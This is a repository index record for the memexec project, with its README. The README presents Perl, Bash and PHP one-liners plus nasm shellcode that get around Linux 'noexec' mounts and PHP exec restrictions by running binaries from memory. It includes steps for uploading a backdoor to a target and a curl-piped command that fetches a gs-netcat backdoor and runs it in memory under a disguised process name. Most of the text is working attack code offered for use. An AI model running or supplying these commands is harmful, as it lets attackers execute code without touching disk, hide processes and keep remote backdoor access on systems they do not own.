{"id":16077951,"url":"https://github.com/hackerschoice/memexec","last_synced_at":"2025-10-10T13:36:09.980Z","repository":{"id":257815997,"uuid":"863479980","full_name":"hackerschoice/memexec","owner":"hackerschoice","description":"Circumventing \"noexec\" mount flag to execute arbitrary linux binaries by ptrace-less process injection","archived":false,"fork":false,"pushed_at":"2025-03-26T21:23:32.000Z","size":71,"stargazers_count":104,"open_issues_count":0,"forks_count":26,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-30T06:04:17.769Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Assembly","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hackerschoice.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-26T11:18:11.000Z","updated_at":"2025-03-27T04:33:23.000Z","dependencies_parsed_at":"2025-02-27T18:17:28.062Z","dependency_job_id":"db84f143-a1d9-454f-b356-65a883d6d3c0","html_url":"https://github.com/hackerschoice/memexec","commit_stats":null,"previous_names":["hackerschoice/memexec"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hackerschoice","download_url":"https://codeload.github.com/hackerschoice/memexec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247445667,"owners_count":20939958,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-09T10:05:35.527Z","updated_at":"2025-10-10T13:36:09.975Z","avatar_url":"https://github.com/hackerschoice.png","language":"Assembly","funding_links":[],"categories":["others"],"sub_categories":[],"readme":"## Circumvent the `noexec` mount flag on Linux and execute abritrary binaries\n\nThis if useful on a Linux system when all writeable locations are mounted with `-o noexec` (including /dev/shm) or to escape PHP's 'exec' restrictions.\n\nUse _one_ of the 3 scripts (perl, bash, php):\n\n- The binary does not need to have +x\n- The binary can reside on a noexec-partition\n- Mostly the binary can be piped directly from the Internet into the memory (and executed there)\n- Works as non-root user\n- The PHP variant also circumvents PHP's \"exec\" restrictions.\n- It injects shellcode into the running process and calls [memfd_create(2)](https://man7.org/linux/man-pages/man2/memfd_create.2.html) and [execveat(2)](https://man7.org/linux/man-pages/man2/execveat.2.html) to load a binary from a noexec-partition (or directly from the Internet).\n- BASH and PHP do not support SYSCALLS. We advanced an old trick.\n\nRead the [circumventing the noexec Article](https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries) for more....\n\n`TIME_STYLE` and `-lah` are used as an example to pass through environment parameters and command line options. \n\n### PERL example:\n```sh\n# From memexec-perl.sh\nmemexec(){ perl '-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$\",0)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV;exit 255' -- \"$@\";}\ncat /bin/ls | TIME_STYLE=+%s memexec -lah\n```\nThis was golfed by the fine people on Mastodon ([@acut3hack](https://@acut3hack@infosec.exchange), [@addision](https://@addison@nothing-ever.works), [@ilv](https://@ilv@infosec.exchange))\n\n### BASH example (by [@messede-degod](https://github.com/messede-degod)):\n```sh\nsource memexec-bash.sh\ncat /bin/ls | TIME_STYLE=+%s memexec -- -lah\n```\n\n### The PHP variant also circumvents [\"shell_exec\" restrictions](https://www.cyberciti.biz/faq/linux-unix-apache-lighttpd-phpini-disable-functions/).\n\n1. Upload `memexec.php` and `egg` (your backdoor) onto the target\n2. Call `curl -SsfL https://target/memexec.php` to execute `egg` and bypassing noexec restrictions\n\n(This is my way of saying \"hey. how are to?\" to my old [team-teso](https://en.wikipedia.org/wiki/TESO_(Austrian_hacker_group)) colleague and long time PHP developer [@i0nic](https://x.com/i0n1c))\n\n---\n\nThe educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohobited by `noexec` or there is no writeable directory (hides as process name `/usr/bin/python3`):\n```shell\ncurl -SsfL https://github.com/hackerschoice/gsocket.io/raw/refs/heads/gh-pages/bin/gs-netcat_mini-linux-$(uname -m) | GS_ARGS=\"-ilD -s ChangeMe\" perl '-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$\",0)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV;exit 255' -- \"$@\"\n```\n---\n\nFor the addicts, here is the nasm of the shellcode (memfd_create, copy loop \u0026 execveat):\n```nasm\n; nasm -felf64 memexec.nasm \u0026\u0026 ld memexec.o \u0026\u0026  ./a.out\n; cat /bin/ls | TIME_STYLE=+%s ./a.out -- -lah\n\nglobal _start\nsection .text\n\n_start:\n    push    0x00676765  ; \"egg\"\n    mov     rax, 0x13f\n    mov     rdi, rsp    ; arg 1: name [egg]\n    xor     rsi, rsi    ; arg 2: 0 = no MFD_CLOEXEC\n    syscall\n    mov     r8, rax\n\n    mov     rax, 2\n    mov     rdi, rsp    ; arg 1: name [egg]\n    xor     rsi, rsi    ; arg 2: 0 = O_RDONLY\n    syscall\n    mov     r9, rax\n\nloop:\n    sub     rsp, 0x400\n    xor     rax, rax    ; arg 0: read_NR\n    mov     rdi, r9     ; arg 1: FD [egg]\n    mov     rsi, rsp    ; arg 2: buffer\n    mov     edx, 0x400  ; arg 3: length\n    syscall\n\n    cmp     rax, 0x00\n    jle     done        ; EOF\n\n    mov     rdx, rax    ; arg 3: length (from read()) \n    mov     eax, 0x01   ; arg 0: write_NR\n    mov     rdi, r8     ; arg 1: FD [memfd]\n    syscall\n    jmp     loop\ndone:\n\n    mov     rax, 322    ; arg 0: execveat_NR\n    mov     rdi, r8     ; arg 1: memfd\n    push    0x00        ; an empty string\n    mov     rsi, rsp    ; arg 2: path (empty string)\n    mov     rdx, rsp    ; arg 3: ARGV points to empty string\n    xor     rcx, rcx    ; arg 4: ENV\n    mov     r8, 0x1000  ; arg 5: AT_EMPTY_PATH\n    xor     r9, r9      ; arg 6: must be clean\n    xor     r10, r10    ; arg 7: must be clean\n    syscall\n\n    mov     rax, 60\n    xor     rdi, rdi\n    syscall\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fmemexec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackerschoice%2Fmemexec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fmemexec/lists"}